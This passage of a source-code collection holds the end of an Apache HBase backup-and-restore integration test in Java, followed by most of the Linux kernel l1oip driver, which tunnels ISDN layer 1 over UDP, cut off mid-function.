Create * a table with many regions, load data, perform series backup/load operations, * then restore and verify data * @see <a href="https://issues.apache.org/jira/browse/HBASE-7912">HBASE-7912</a> * @see <a href="https://issues.apache.org/jira/browse/HBASE-14123">HBASE-14123</a> */ @Category(IntegrationTests.class) public class IntegrationTestBackupRestore extends IntegrationTestBase { private static final String CLASS_NAME = IntegrationTestBackupRestore.class.getSimpleName(); protected static final Logger LOG = LoggerFactory.getLogger(IntegrationTestBackupRestore.class); protected static final String NUMBER_OF_TABLES_KEY = "num_tables"; protected static final String COLUMN_NAME = "f"; protected static final String REGION_COUNT_KEY = "regions_per_rs"; protected static final String REGIONSERVER_COUNT_KEY = "region_servers"; protected static final String ROWS_PER_ITERATION_KEY = "rows_in_iteration"; protected static final String NUM_ITERATIONS_KEY = "num_iterations"; protected static final int DEFAULT_REGION_COUNT = 10; protected static final int DEFAULT_REGIONSERVER_COUNT = 5; protected static final int DEFAULT_NUMBER_OF_TABLES = 1; protected static final int DEFAULT_NUM_ITERATIONS = 10; protected static final int DEFAULT_ROWS_IN_ITERATION = 500000; protected static final String SLEEP_TIME_KEY = "sleeptime"; // short default interval because tests don't run very long. protected static final long SLEEP_TIME_DEFAULT = 50000L; protected static int rowsInIteration; protected static int regionsCountPerServer; protected static int regionServerCount; protected static int numIterations; protected static int numTables; protected static TableName[] tableNames; protected long sleepTime; protected static Object lock = new Object(); private static String BACKUP_ROOT_DIR = "backupIT"; @Override @Before public void setUp() throws Exception { util = new IntegrationTestingUtility(); Configuration conf = util.getConfiguration(); regionsCountPerServer = conf.getInt(REGION_COUNT_KEY, DEFAULT_REGION_COUNT); regionServerCount = conf.getInt(REGIONSERVER_COUNT_KEY, DEFAULT_REGIONSERVER_COUNT); rowsInIteration = conf.getInt(ROWS_PER_ITERATION_KEY, DEFAULT_ROWS_IN_ITERATION); numIterations = conf.getInt(NUM_ITERATIONS_KEY, DEFAULT_NUM_ITERATIONS); numTables = conf.getInt(NUMBER_OF_TABLES_KEY, DEFAULT_NUMBER_OF_TABLES); sleepTime = conf.getLong(SLEEP_TIME_KEY, SLEEP_TIME_DEFAULT); enableBackup(conf); LOG.info("Initializing cluster with {} region servers.", regionServerCount); util.initializeCluster(regionServerCount); LOG.info("Cluster initialized and ready"); } @After public void tearDown() throws IOException { LOG.info("Cleaning up after test."); if(util.isDistributedCluster()) { deleteTablesIfAny(); LOG.info("Cleaning up after test. Deleted tables"); cleanUpBackupDir(); } LOG.info("Restoring cluster."); util.restoreCluster(); LOG.info("Cluster restored."); } @Override public void setUpMonkey() throws Exception { Policy p = new PeriodicRandomActionPolicy(sleepTime, new RestartRandomRsExceptMetaAction(sleepTime)); this.monkey = new PolicyBasedChaosMonkey(util, p); startMonkey(); } private void deleteTablesIfAny() throws IOException { for (TableName table : tableNames) { util.deleteTableIfAny(table); } } private void createTables() throws Exception { tableNames = new TableName[numTables]; for (int i = 0; i < numTables; i++) { tableNames[i] = TableName.valueOf(CLASS_NAME + ".table." 
+ i); } for (TableName table : tableNames) { createTable(table); } } private void enableBackup(Configuration conf) { // Enable backup conf.setBoolean(BackupRestoreConstants.BACKUP_ENABLE_KEY, true); BackupManager.decorateMasterConfiguration(conf); BackupManager.decorateRegionServerConfiguration(conf); } private void cleanUpBackupDir() throws IOException { FileSystem fs = FileSystem.get(util.getConfiguration()); fs.delete(new Path(BACKUP_ROOT_DIR), true); } @Test public void testBackupRestore() throws Exception { BACKUP_ROOT_DIR = util.getDataTestDirOnTestFS() + Path.SEPARATOR + BACKUP_ROOT_DIR; createTables(); runTestMulti(); } private void runTestMulti() throws IOException { LOG.info("IT backup & restore started"); Thread[] workers = new Thread[numTables]; for (int i = 0; i < numTables; i++) { final TableName table = tableNames[i]; Runnable r = new Runnable() { @Override public void run() { try { runTestSingle(table); } catch (IOException e) { LOG.error("Failed", e); Assert.fail(e.getMessage()); } } }; workers[i] = new Thread(r); workers[i].start(); } // Wait all workers to finish for (Thread t : workers) { Uninterruptibles.joinUninterruptibly(t); } LOG.info("IT backup & restore finished"); } private void createTable(TableName tableName) throws Exception { long startTime, endTime; TableDescriptorBuilder builder = TableDescriptorBuilder.newBuilder(tableName); TableDescriptor desc = builder.build(); ColumnFamilyDescriptorBuilder cbuilder = ColumnFamilyDescriptorBuilder.newBuilder(COLUMN_NAME.getBytes(Charset.defaultCharset())); ColumnFamilyDescriptor[] columns = new ColumnFamilyDescriptor[] { cbuilder.build() }; LOG.info("Creating table {} with {} splits.", tableName, regionsCountPerServer * regionServerCount); startTime = System.currentTimeMillis(); HBaseTestingUtility.createPreSplitLoadTestTable(util.getConfiguration(), desc, columns, regionsCountPerServer); util.waitTableAvailable(tableName); endTime = System.currentTimeMillis(); LOG.info("Pre-split table created successfully in {}ms.", (endTime - startTime)); } private void loadData(TableName table, int numRows) throws IOException { Connection conn = util.getConnection(); // #0- insert some data to a table Table t1 = conn.getTable(table); util.loadRandomRows(t1, new byte[]{'f'}, 100, numRows); // flush table conn.getAdmin().flush(TableName.valueOf(table.getName())); } private String backup(BackupRequest request, BackupAdmin client) throws IOException { String backupId = client.backupTables(request); return backupId; } private void restore(RestoreRequest request, BackupAdmin client) throws IOException { client.restore(request); } private void merge(String[] backupIds, BackupAdmin client) throws IOException { client.mergeBackups(backupIds); } private void runTestSingle(TableName table) throws IOException { List<String> backupIds = new ArrayList<String>(); List<Integer> tableSizes = new ArrayList<Integer>(); try (Connection conn = util.getConnection(); Admin admin = conn.getAdmin(); BackupAdmin client = new BackupAdminImpl(conn);) { // #0- insert some data to table 'table' loadData(table, rowsInIteration); tableSizes.add(rowsInIteration); // #1 - create full backup for table first LOG.info("create full backup image for {}", table); List<TableName> tables = Lists.newArrayList(table); BackupRequest.Builder builder = new BackupRequest.Builder(); BackupRequest request = builder.withBackupType(BackupType.FULL).withTableList(tables) .withTargetRootDir(BACKUP_ROOT_DIR).build(); String backupIdFull = backup(request, client); 
assertTrue(checkSucceeded(backupIdFull)); backupIds.add(backupIdFull); // Now continue with incremental backups int count = 1; while (count++ < numIterations) { // Load data loadData(table, rowsInIteration); tableSizes.add(rowsInIteration * count); // Do incremental backup builder = new BackupRequest.Builder(); request = builder.withBackupType(BackupType.INCREMENTAL).withTableList(tables) .withTargetRootDir(BACKUP_ROOT_DIR).build(); String backupId = backup(request, client); assertTrue(checkSucceeded(backupId)); backupIds.add(backupId); // Restore incremental backup for table, with overwrite for previous backup String previousBackupId = backupIds.get(backupIds.size() - 2); restoreVerifyTable(conn, client, table, previousBackupId, rowsInIteration * (count - 1)); // Restore incremental backup for table, with overwrite for last backup restoreVerifyTable(conn, client, table, backupId, rowsInIteration * count); } // Now merge all incremental and restore String[] incBackupIds = allIncremental(backupIds); merge(incBackupIds, client); // Restore last one String backupId = incBackupIds[incBackupIds.length - 1]; // restore incremental backup for table, with overwrite TableName[] tablesRestoreIncMultiple = new TableName[] { table }; restore(createRestoreRequest(BACKUP_ROOT_DIR, backupId, false, tablesRestoreIncMultiple, null, true), client); Table hTable = conn.getTable(table); Assert.assertEquals(util.countRows(hTable), rowsInIteration * numIterations); hTable.close(); LOG.info("{} loop {} finished.", Thread.currentThread().getName(), (count-1)); } } private void restoreVerifyTable(Connection conn, BackupAdmin client, TableName table, String backupId, long expectedRows) throws IOException { TableName[] tablesRestoreIncMultiple = new TableName[] { table }; restore(createRestoreRequest(BACKUP_ROOT_DIR, backupId, false, tablesRestoreIncMultiple, null, true), client); Table hTable = conn.getTable(table); Assert.assertEquals(expectedRows, util.countRows(hTable)); hTable.close(); } private String[] allIncremental(List<String> backupIds) { int size = backupIds.size(); backupIds = backupIds.subList(1, size); String[] arr = new String[size - 1]; backupIds.toArray(arr); return arr; } /** * * @param backupId pass backup ID to check status of * @return status of backup */ protected boolean checkSucceeded(String backupId) throws IOException { BackupInfo status = getBackupInfo(backupId); if (status == null) { return false; } return status.getState() == BackupState.COMPLETE; } private BackupInfo getBackupInfo(String backupId) throws IOException { try (BackupSystemTable table = new BackupSystemTable(util.getConnection())) { return table.readBackupInfo(backupId); } } /** * Get restore request. 
* * @param backupRootDir directory where backup is located * @param backupId backup ID * @param check check the backup * @param fromTables table names to restore from * @param toTables new table names to restore to * @param isOverwrite overwrite the table(s) * @return an instance of RestoreRequest */ public RestoreRequest createRestoreRequest(String backupRootDir, String backupId, boolean check, TableName[] fromTables, TableName[] toTables, boolean isOverwrite) { RestoreRequest.Builder builder = new RestoreRequest.Builder(); return builder.withBackupRootDir(backupRootDir) .withBackupId(backupId) .withCheck(check) .withFromTables(fromTables) .withToTables(toTables) .withOvewrite(isOverwrite).build(); } @Override public void setUpCluster() throws Exception { util = getTestingUtil(getConf()); enableBackup(getConf()); LOG.debug("Initializing/checking cluster has {} servers",regionServerCount); util.initializeCluster(regionServerCount); LOG.debug("Done initializing/checking cluster"); } /** * * @return status of CLI execution */ @Override public int runTestFromCommandLine() throws Exception { // Check if backup is enabled if (!BackupManager.isBackupEnabled(getConf())) { System.err.println(BackupRestoreConstants.ENABLE_BACKUP); return -1; } System.out.println(BackupRestoreConstants.VERIFY_BACKUP); testBackupRestore(); return 0; } @Override public TableName getTablename() { // That is only valid when Monkey is CALM (no monkey) return null; } @Override protected Set<String> getColumnFamilies() { // That is only valid when Monkey is CALM (no monkey) return null; } @Override protected void addOptions() { addOptWithArg(REGIONSERVER_COUNT_KEY, "Total number of region servers. Default: '" + DEFAULT_REGIONSERVER_COUNT + "'"); addOptWithArg(REGION_COUNT_KEY, "Total number of regions. Default: " + DEFAULT_REGION_COUNT); addOptWithArg(ROWS_PER_ITERATION_KEY, "Total number of data rows to be loaded during one iteration." + " Default: " + DEFAULT_ROWS_IN_ITERATION); addOptWithArg(NUM_ITERATIONS_KEY, "Total number iterations." + " Default: " + DEFAULT_NUM_ITERATIONS); addOptWithArg(NUMBER_OF_TABLES_KEY, "Total number of tables in the test." + " Default: " + DEFAULT_NUMBER_OF_TABLES); addOptWithArg(SLEEP_TIME_KEY, "Sleep time of chaos monkey in ms " + "to restart random region server. 
Default: " + SLEEP_TIME_DEFAULT); } @Override protected void processOptions(CommandLine cmd) { super.processOptions(cmd); regionsCountPerServer = Integer.parseInt(cmd.getOptionValue(REGION_COUNT_KEY, Integer.toString(DEFAULT_REGION_COUNT))); regionServerCount = Integer.parseInt(cmd.getOptionValue(REGIONSERVER_COUNT_KEY, Integer.toString(DEFAULT_REGIONSERVER_COUNT))); rowsInIteration = Integer.parseInt(cmd.getOptionValue(ROWS_PER_ITERATION_KEY, Integer.toString(DEFAULT_ROWS_IN_ITERATION))); numIterations = Integer.parseInt(cmd.getOptionValue(NUM_ITERATIONS_KEY, Integer.toString(DEFAULT_NUM_ITERATIONS))); numTables = Integer.parseInt(cmd.getOptionValue(NUMBER_OF_TABLES_KEY, Integer.toString(DEFAULT_NUMBER_OF_TABLES))); sleepTime = Long.parseLong(cmd.getOptionValue(SLEEP_TIME_KEY, Long.toString(SLEEP_TIME_DEFAULT))); LOG.info(MoreObjects.toStringHelper("Parsed Options") .add(REGION_COUNT_KEY, regionsCountPerServer) .add(REGIONSERVER_COUNT_KEY, regionServerCount) .add(ROWS_PER_ITERATION_KEY, rowsInIteration) .add(NUM_ITERATIONS_KEY, numIterations) .add(NUMBER_OF_TABLES_KEY, numTables) .add(SLEEP_TIME_KEY, sleepTime) .toString()); } /** * * @param args argument list */ public static void main(String[] args) throws Exception { Configuration conf = HBaseConfiguration.create(); IntegrationTestingUtility.setUseDistributedCluster(conf); int status = ToolRunner.run(conf, new IntegrationTestBackupRestore(), args); System.exit(status); } }
{ "pile_set_name": "Github" }
/* * l1oip.c low level driver for tunneling layer 1 over IP * * NOTE: It is not compatible with TDMoIP nor "ISDN over IP". * * Author Andreas Eversberg ([email protected]) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2, or (at your option) * any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. * */ /* module parameters: * type: Value 1 = BRI Value 2 = PRI Value 3 = BRI (multi channel frame, not supported yet) Value 4 = PRI (multi channel frame, not supported yet) A multi channel frame reduces overhead to a single frame for all b-channels, but increases delay. (NOTE: Multi channel frames are not implemented yet.) * codec: Value 0 = transparent (default) Value 1 = transfer ALAW Value 2 = transfer ULAW Value 3 = transfer generic 4 bit compression. * ulaw: 0 = we use a-Law (default) 1 = we use u-Law * limit: limitation of B-channels to control bandwidth (1...126) BRI: 1 or 2 PRI: 1-30, 31-126 (126, because dchannel ist not counted here) Also limited ressources are used for stack, resulting in less channels. It is possible to have more channels than 30 in PRI mode, this must be supported by the application. * ip: byte representation of remote ip address (127.0.0.1 -> 127,0,0,1) If not given or four 0, no remote address is set. For multiple interfaces, concat ip addresses. (127,0,0,1,127,0,0,1) * port: port number (local interface) If not given or 0, port 931 is used for fist instance, 932 for next... For multiple interfaces, different ports must be given. * remoteport: port number (remote interface) If not given or 0, remote port equals local port For multiple interfaces on equal sites, different ports must be given. * ondemand: 0 = fixed (always transmit packets, even when remote side timed out) 1 = on demand (only transmit packets, when remote side is detected) the default is 0 NOTE: ID must also be set for on demand. * id: optional value to identify frames. This value must be equal on both peers and should be random. If omitted or 0, no ID is transmitted. * debug: NOTE: only one debug value must be given for all cards enable debugging (see l1oip.h for debug options) Special mISDN controls: op = MISDN_CTRL_SETPEER* p1 = bytes 0-3 : remote IP address in network order (left element first) p2 = bytes 1-2 : remote port in network order (high byte first) optional: p2 = bytes 3-4 : local port in network order (high byte first) op = MISDN_CTRL_UNSETPEER* * Use l1oipctrl for comfortable setting or removing ip address. (Layer 1 Over IP CTRL) L1oIP-Protocol -------------- Frame Header: 7 6 5 4 3 2 1 0 +---------------+ |Ver|T|I|Coding | +---------------+ | ID byte 3 * | +---------------+ | ID byte 2 * | +---------------+ | ID byte 1 * | +---------------+ | ID byte 0 * | +---------------+ |M| Channel | +---------------+ | Length * | +---------------+ | Time Base MSB | +---------------+ | Time Base LSB | +---------------+ | Data.... | ... 
| | +---------------+ |M| Channel | +---------------+ | Length * | +---------------+ | Time Base MSB | +---------------+ | Time Base LSB | +---------------+ | Data.... | ... * Only included in some cases. - Ver = Version If version is missmatch, the frame must be ignored. - T = Type of interface Must be 0 for S0 or 1 for E1. - I = Id present If bit is set, four ID bytes are included in frame. - ID = Connection ID Additional ID to prevent Denial of Service attacs. Also it prevents hijacking connections with dynamic IP. The ID should be random and must not be 0. - Coding = Type of codec Must be 0 for no transcoding. Also for D-channel and other HDLC frames. 1 and 2 are reserved for explicitly use of a-LAW or u-LAW codec. 3 is used for generic table compressor. - M = More channels to come. If this flag is 1, the following byte contains the length of the channel data. After the data block, the next channel will be defined. The flag for the last channel block (or if only one channel is transmitted), must be 0 and no length is given. - Channel = Channel number 0 reserved 1-3 channel data for S0 (3 is D-channel) 1-31 channel data for E1 (16 is D-channel) 32-127 channel data for extended E1 (16 is D-channel) - The length is used if the M-flag is 1. It is used to find the next channel inside frame. NOTE: A value of 0 equals 256 bytes of data. -> For larger data blocks, a single frame must be used. -> For larger streams, a single frame or multiple blocks with same channel ID must be used. - Time Base = Timestamp of first sample in frame The "Time Base" is used to rearange packets and to detect packet loss. The 16 bits are sent in network order (MSB first) and count 1/8000 th of a second. This causes a wrap around each 8,192 seconds. There is no requirement for the initial "Time Base", but 0 should be used for the first packet. In case of HDLC data, this timestamp counts the packet or byte number. Two Timers: After initialisation, a timer of 15 seconds is started. Whenever a packet is transmitted, the timer is reset to 15 seconds again. If the timer expires, an empty packet is transmitted. This keep the connection alive. When a valid packet is received, a timer 65 seconds is started. The interface become ACTIVE. If the timer expires, the interface becomes INACTIVE. Dynamic IP handling: To allow dynamic IP, the ID must be non 0. In this case, any packet with the correct port number and ID will be accepted. If the remote side changes its IP the new IP is used for all transmitted packets until it changes again. On Demand: If the ondemand parameter is given, the remote IP is set to 0 on timeout. This will stop keepalive traffic to remote. If the remote is online again, traffic will continue to the remote address. This is useful for road warriors. This feature only works with ID set, otherwhise it is highly unsecure. Socket and Thread ----------------- The complete socket opening and closing is done by a thread. When the thread opened a socket, the hc->socket descriptor is set. Whenever a packet shall be sent to the socket, the hc->socket must be checked wheter not NULL. To prevent change in socket descriptor, the hc->socket_lock must be used. To change the socket, a recall of l1oip_socket_open() will safely kill the socket process and create a new one. 
*/ #define L1OIP_VERSION 0 /* 0...3 */ #include <linux/module.h> #include <linux/delay.h> #include <linux/mISDNif.h> #include <linux/mISDNhw.h> #include <linux/mISDNdsp.h> #include <linux/init.h> #include <linux/in.h> #include <linux/inet.h> #include <linux/workqueue.h> #include <linux/kthread.h> #include <linux/slab.h> #include <linux/sched/signal.h> #include <net/sock.h> #include "core.h" #include "l1oip.h" static const char *l1oip_revision = "2.00"; static int l1oip_cnt; static spinlock_t l1oip_lock; static struct list_head l1oip_ilist; #define MAX_CARDS 16 static u_int type[MAX_CARDS]; static u_int codec[MAX_CARDS]; static u_int ip[MAX_CARDS * 4]; static u_int port[MAX_CARDS]; static u_int remoteport[MAX_CARDS]; static u_int ondemand[MAX_CARDS]; static u_int limit[MAX_CARDS]; static u_int id[MAX_CARDS]; static int debug; static int ulaw; MODULE_AUTHOR("Andreas Eversberg"); MODULE_LICENSE("GPL"); module_param_array(type, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(codec, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(ip, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(port, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(remoteport, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(ondemand, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(limit, uint, NULL, S_IRUGO | S_IWUSR); module_param_array(id, uint, NULL, S_IRUGO | S_IWUSR); module_param(ulaw, uint, S_IRUGO | S_IWUSR); module_param(debug, uint, S_IRUGO | S_IWUSR); /* * send a frame via socket, if open and restart timer */ static int l1oip_socket_send(struct l1oip *hc, u8 localcodec, u8 channel, u32 chanmask, u16 timebase, u8 *buf, int len) { u8 *p; u8 frame[MAX_DFRAME_LEN_L1 + 32]; struct socket *socket = NULL; if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: sending data to socket (len = %d)\n", __func__, len); p = frame; /* restart timer */ if (time_before(hc->keep_tl.expires, jiffies + 5 * HZ)) mod_timer(&hc->keep_tl, jiffies + L1OIP_KEEPALIVE * HZ); else hc->keep_tl.expires = jiffies + L1OIP_KEEPALIVE * HZ; if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: resetting timer\n", __func__); /* drop if we have no remote ip or port */ if (!hc->sin_remote.sin_addr.s_addr || !hc->sin_remote.sin_port) { if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: dropping frame, because remote " "IP is not set.\n", __func__); return len; } /* assemble frame */ *p++ = (L1OIP_VERSION << 6) /* version and coding */ | (hc->pri ? 0x20 : 0x00) /* type */ | (hc->id ? 
0x10 : 0x00) /* id */ | localcodec; if (hc->id) { *p++ = hc->id >> 24; /* id */ *p++ = hc->id >> 16; *p++ = hc->id >> 8; *p++ = hc->id; } *p++ = 0x00 + channel; /* m-flag, channel */ *p++ = timebase >> 8; /* time base */ *p++ = timebase; if (buf && len) { /* add data to frame */ if (localcodec == 1 && ulaw) l1oip_ulaw_to_alaw(buf, len, p); else if (localcodec == 2 && !ulaw) l1oip_alaw_to_ulaw(buf, len, p); else if (localcodec == 3) len = l1oip_law_to_4bit(buf, len, p, &hc->chan[channel].codecstate); else memcpy(p, buf, len); } len += p - frame; /* check for socket in safe condition */ spin_lock(&hc->socket_lock); if (!hc->socket) { spin_unlock(&hc->socket_lock); return 0; } /* seize socket */ socket = hc->socket; hc->socket = NULL; spin_unlock(&hc->socket_lock); /* send packet */ if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: sending packet to socket (len " "= %d)\n", __func__, len); hc->sendiov.iov_base = frame; hc->sendiov.iov_len = len; len = kernel_sendmsg(socket, &hc->sendmsg, &hc->sendiov, 1, len); /* give socket back */ hc->socket = socket; /* no locking required */ return len; } /* * receive channel data from socket */ static void l1oip_socket_recv(struct l1oip *hc, u8 remotecodec, u8 channel, u16 timebase, u8 *buf, int len) { struct sk_buff *nskb; struct bchannel *bch; struct dchannel *dch; u8 *p; u32 rx_counter; if (len == 0) { if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: received empty keepalive data, " "ignoring\n", __func__); return; } if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: received data, sending to mISDN (%d)\n", __func__, len); if (channel < 1 || channel > 127) { printk(KERN_WARNING "%s: packet error - channel %d out of " "range\n", __func__, channel); return; } dch = hc->chan[channel].dch; bch = hc->chan[channel].bch; if (!dch && !bch) { printk(KERN_WARNING "%s: packet error - channel %d not in " "stack\n", __func__, channel); return; } /* prepare message */ nskb = mI_alloc_skb((remotecodec == 3) ? (len << 1) : len, GFP_ATOMIC); if (!nskb) { printk(KERN_ERR "%s: No mem for skb.\n", __func__); return; } p = skb_put(nskb, (remotecodec == 3) ? 
(len << 1) : len); if (remotecodec == 1 && ulaw) l1oip_alaw_to_ulaw(buf, len, p); else if (remotecodec == 2 && !ulaw) l1oip_ulaw_to_alaw(buf, len, p); else if (remotecodec == 3) len = l1oip_4bit_to_law(buf, len, p); else memcpy(p, buf, len); /* send message up */ if (dch && len >= 2) { dch->rx_skb = nskb; recv_Dchannel(dch); } if (bch) { /* expand 16 bit sequence number to 32 bit sequence number */ rx_counter = hc->chan[channel].rx_counter; if (((s16)(timebase - rx_counter)) >= 0) { /* time has changed forward */ if (timebase >= (rx_counter & 0xffff)) rx_counter = (rx_counter & 0xffff0000) | timebase; else rx_counter = ((rx_counter & 0xffff0000) + 0x10000) | timebase; } else { /* time has changed backwards */ if (timebase < (rx_counter & 0xffff)) rx_counter = (rx_counter & 0xffff0000) | timebase; else rx_counter = ((rx_counter & 0xffff0000) - 0x10000) | timebase; } hc->chan[channel].rx_counter = rx_counter; #ifdef REORDER_DEBUG if (hc->chan[channel].disorder_flag) { swap(hc->chan[channel].disorder_skb, nskb); swap(hc->chan[channel].disorder_cnt, rx_counter); } hc->chan[channel].disorder_flag ^= 1; if (nskb) #endif queue_ch_frame(&bch->ch, PH_DATA_IND, rx_counter, nskb); } } /* * parse frame and extract channel data */ static void l1oip_socket_parse(struct l1oip *hc, struct sockaddr_in *sin, u8 *buf, int len) { u32 packet_id; u8 channel; u8 remotecodec; u16 timebase; int m, mlen; int len_start = len; /* initial frame length */ struct dchannel *dch = hc->chan[hc->d_idx].dch; if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: received frame, parsing... (%d)\n", __func__, len); /* check length */ if (len < 1 + 1 + 2) { printk(KERN_WARNING "%s: packet error - length %d below " "4 bytes\n", __func__, len); return; } /* check version */ if (((*buf) >> 6) != L1OIP_VERSION) { printk(KERN_WARNING "%s: packet error - unknown version %d\n", __func__, buf[0]>>6); return; } /* check type */ if (((*buf) & 0x20) && !hc->pri) { printk(KERN_WARNING "%s: packet error - received E1 packet " "on S0 interface\n", __func__); return; } if (!((*buf) & 0x20) && hc->pri) { printk(KERN_WARNING "%s: packet error - received S0 packet " "on E1 interface\n", __func__); return; } /* get id flag */ packet_id = (*buf >> 4) & 1; /* check coding */ remotecodec = (*buf) & 0x0f; if (remotecodec > 3) { printk(KERN_WARNING "%s: packet error - remotecodec %d " "unsupported\n", __func__, remotecodec); return; } buf++; len--; /* check packet_id */ if (packet_id) { if (!hc->id) { printk(KERN_WARNING "%s: packet error - packet has id " "0x%x, but we have not\n", __func__, packet_id); return; } if (len < 4) { printk(KERN_WARNING "%s: packet error - packet too " "short for ID value\n", __func__); return; } packet_id = (*buf++) << 24; packet_id += (*buf++) << 16; packet_id += (*buf++) << 8; packet_id += (*buf++); len -= 4; if (packet_id != hc->id) { printk(KERN_WARNING "%s: packet error - ID mismatch, " "got 0x%x, we 0x%x\n", __func__, packet_id, hc->id); return; } } else { if (hc->id) { printk(KERN_WARNING "%s: packet error - packet has no " "ID, but we have\n", __func__); return; } } multiframe: if (len < 1) { printk(KERN_WARNING "%s: packet error - packet too short, " "channel expected at position %d.\n", __func__, len-len_start + 1); return; } /* get channel and multiframe flag */ channel = *buf & 0x7f; m = *buf >> 7; buf++; len--; /* check length on multiframe */ if (m) { if (len < 1) { printk(KERN_WARNING "%s: packet error - packet too " "short, length expected at position %d.\n", __func__, len_start - len - 1); return; } mlen = 
*buf++; len--; if (mlen == 0) mlen = 256; if (len < mlen + 3) { printk(KERN_WARNING "%s: packet error - length %d at " "position %d exceeds total length %d.\n", __func__, mlen, len_start-len - 1, len_start); return; } if (len == mlen + 3) { printk(KERN_WARNING "%s: packet error - length %d at " "position %d will not allow additional " "packet.\n", __func__, mlen, len_start-len + 1); return; } } else mlen = len - 2; /* single frame, subtract timebase */ if (len < 2) { printk(KERN_WARNING "%s: packet error - packet too short, time " "base expected at position %d.\n", __func__, len-len_start + 1); return; } /* get time base */ timebase = (*buf++) << 8; timebase |= (*buf++); len -= 2; /* if inactive, we send up a PH_ACTIVATE and activate */ if (!test_bit(FLG_ACTIVE, &dch->Flags)) { if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: interface become active due to " "received packet\n", __func__); test_and_set_bit(FLG_ACTIVE, &dch->Flags); _queue_data(&dch->dev.D, PH_ACTIVATE_IND, MISDN_ID_ANY, 0, NULL, GFP_ATOMIC); } /* distribute packet */ l1oip_socket_recv(hc, remotecodec, channel, timebase, buf, mlen); buf += mlen; len -= mlen; /* multiframe */ if (m) goto multiframe; /* restart timer */ if (time_before(hc->timeout_tl.expires, jiffies + 5 * HZ) || !hc->timeout_on) { hc->timeout_on = 1; mod_timer(&hc->timeout_tl, jiffies + L1OIP_TIMEOUT * HZ); } else /* only adjust timer */ hc->timeout_tl.expires = jiffies + L1OIP_TIMEOUT * HZ; /* if ip or source port changes */ if ((hc->sin_remote.sin_addr.s_addr != sin->sin_addr.s_addr) || (hc->sin_remote.sin_port != sin->sin_port)) { if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: remote address changes from " "0x%08x to 0x%08x (port %d to %d)\n", __func__, ntohl(hc->sin_remote.sin_addr.s_addr), ntohl(sin->sin_addr.s_addr), ntohs(hc->sin_remote.sin_port), ntohs(sin->sin_port)); hc->sin_remote.sin_addr.s_addr = sin->sin_addr.s_addr; hc->sin_remote.sin_port = sin->sin_port; } } /* * socket stuff */ static int l1oip_socket_thread(void *data) { struct l1oip *hc = (struct l1oip *)data; int ret = 0; struct sockaddr_in sin_rx; struct kvec iov; struct msghdr msg = {.msg_name = &sin_rx, .msg_namelen = sizeof(sin_rx)}; unsigned char *recvbuf; size_t recvbuf_size = 1500; int recvlen; struct socket *socket = NULL; DECLARE_COMPLETION_ONSTACK(wait); /* allocate buffer memory */ recvbuf = kmalloc(recvbuf_size, GFP_KERNEL); if (!recvbuf) { printk(KERN_ERR "%s: Failed to alloc recvbuf.\n", __func__); ret = -ENOMEM; goto fail; } iov.iov_base = recvbuf; iov.iov_len = recvbuf_size; /* make daemon */ allow_signal(SIGTERM); /* create socket */ if (sock_create(PF_INET, SOCK_DGRAM, IPPROTO_UDP, &socket)) { printk(KERN_ERR "%s: Failed to create socket.\n", __func__); ret = -EIO; goto fail; } /* set incoming address */ hc->sin_local.sin_family = AF_INET; hc->sin_local.sin_addr.s_addr = INADDR_ANY; hc->sin_local.sin_port = htons((unsigned short)hc->localport); /* set outgoing address */ hc->sin_remote.sin_family = AF_INET; hc->sin_remote.sin_addr.s_addr = htonl(hc->remoteip); hc->sin_remote.sin_port = htons((unsigned short)hc->remoteport); /* bind to incoming port */ if (socket->ops->bind(socket, (struct sockaddr *)&hc->sin_local, sizeof(hc->sin_local))) { printk(KERN_ERR "%s: Failed to bind socket to port %d.\n", __func__, hc->localport); ret = -EINVAL; goto fail; } /* check sk */ if (socket->sk == NULL) { printk(KERN_ERR "%s: socket->sk == NULL\n", __func__); ret = -EIO; goto fail; } /* build send message */ hc->sendmsg.msg_name = &hc->sin_remote; 
hc->sendmsg.msg_namelen = sizeof(hc->sin_remote); hc->sendmsg.msg_control = NULL; hc->sendmsg.msg_controllen = 0; /* give away socket */ spin_lock(&hc->socket_lock); hc->socket = socket; spin_unlock(&hc->socket_lock); /* read loop */ if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: socket created and open\n", __func__); while (!signal_pending(current)) { iov_iter_kvec(&msg.msg_iter, READ | ITER_KVEC, &iov, 1, recvbuf_size); recvlen = sock_recvmsg(socket, &msg, 0); if (recvlen > 0) { l1oip_socket_parse(hc, &sin_rx, recvbuf, recvlen); } else { if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_WARNING "%s: broken pipe on socket\n", __func__); } } /* get socket back, check first if in use, maybe by send function */ spin_lock(&hc->socket_lock); /* if hc->socket is NULL, it is in use until it is given back */ while (!hc->socket) { spin_unlock(&hc->socket_lock); schedule_timeout(HZ / 10); spin_lock(&hc->socket_lock); } hc->socket = NULL; spin_unlock(&hc->socket_lock); if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: socket thread terminating\n", __func__); fail: /* free recvbuf */ kfree(recvbuf); /* close socket */ if (socket) sock_release(socket); /* if we got killed, signal completion */ complete(&hc->socket_complete); hc->socket_thread = NULL; /* show termination of thread */ if (debug & DEBUG_L1OIP_SOCKET) 